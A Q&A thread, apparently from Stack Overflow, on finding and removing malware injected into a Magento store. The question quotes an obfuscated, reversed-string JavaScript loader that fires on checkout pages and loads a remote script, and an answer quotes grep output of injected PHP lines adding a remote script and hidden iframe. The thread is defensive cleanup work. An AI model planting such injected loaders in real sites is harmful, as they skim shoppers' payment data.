# How to remove script inserted after the body tag in Magento?

Tags: php, magento

I have a malicious script that's been inserted right after the body tag and I don't know which file to check to remove it, I've checked everywhere in the admin as well as template files and it's not where to be found. The virus looks like this:

```
if((new 
RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) 
{document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-
knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};
```

Comment: have you checked it in miscellaneous code? in admin panel?

Comment: Miscellaneous HTML located at `system->configuration->design->footer->Miscellaneous HTML` below `copyright` check this may be that `code / virus` located there

Answer (score 0):

**Please try below approaches**

> I would recommend the following approach for removing third party scripts in Magento:
>
> **> Approach 1.** Please go to your theme ***app/design/frontend/Yourtheme/default/template/page/*** , open following files and find this code and comment, after clear cache and check your store.

```
<?php echo $this->getAbsoluteFooter() ?>
```

> 1column.phtml
>
> 2columns-left.phtml
>
> 2columns-right.phtml
>
> 3columns.phtml
>
> *All Miscellaneous code comes under getAbsoluteFooter() function,*
>
> **> Approach 2:** GO Admin Panel General > Design > Footer > Miscellaneous HTML
>
> **> Approach 3 :** Go to local.xml/page.xml file and check this below code, might be added on same file like this

```
<block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
    <label>Page Top</label>
```

Hope it's helpful for you.

Answer (score 0):

As long as you know what the names of the scripts are, it's easy to get rid of these malicious scripts.

I had many of these scripts injected into my website, most of them were scripts and iframes pointing to a domain `http://siteverification.online`.

I am not a Magento expert but I figured that then can come from only 2 places:

1. The Database
2. Filesystem (HTML templates or PHP files)

**For the database**, I am using MySQL, and since I have PhpMyAdmin installed I took advantage of its **Search** function, which can search all fields of all tables of the database. I just searched for `siteverification.online` and found some entries, and deleted them.

**For the filesystem**, I logged on through SSH and just search the whole magento website filesystem, like this:

```
$ grep -r "siteverification.online" /var/www/magento-project
  ./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
  ./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
```

In my case it turns out that some PHP code was injected in `index.php`. But if code was injected in any other php or html file this would find them as well since the search is recursive (`-r` flag).

That's it. I don't even understand Magento's filesystem and database structures, but using these radical search methods I got rid of all the malware in a few minutes.

Comment: Were you able to find the solution of it